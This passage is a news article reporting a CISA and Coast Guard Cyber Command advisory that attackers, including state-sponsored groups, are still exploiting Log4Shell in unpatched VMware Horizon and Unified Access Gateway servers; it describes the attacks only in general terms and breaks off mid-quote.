CISA: Hackers Continue to Exploit Log4Shell in Unpatched VMware Servers

pcmag.com:

VMware released patches related to Log4Shell, a vulnerability in a popular Java framework that left countless servers at risk, in December 2021. Yet the Cybersecurity and Infrastructure Security Agency (CISA) and US Coast Guard Cyber Command (CGCYBER) say that hackers continue to exploit the vulnerability more than six months after those patches were made available.

The agencies say in a joint Cybersecurity Advisory(Opens in a new window) published on June 23 that "cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds."

CISA and CGCYBER say at least some targeted organizations have been infected with malware the hackers could use in conjunction with their command and control infrastructure. "In one confirmed compromise," the agencies say, "these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data."

This isn't the first time we've been warned about hackers targeting VMware Horizon servers that remain susceptible to Log4Shell. Huntress, a security company founded by former National Security Agency (NSA) hackers, said in January that attackers were exploiting that vulnerability to install the popular Cobalt Strike command and control framework on victims' networks.

"For those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells," Huntress said at the time, "you should seriously consider the possibility that your server is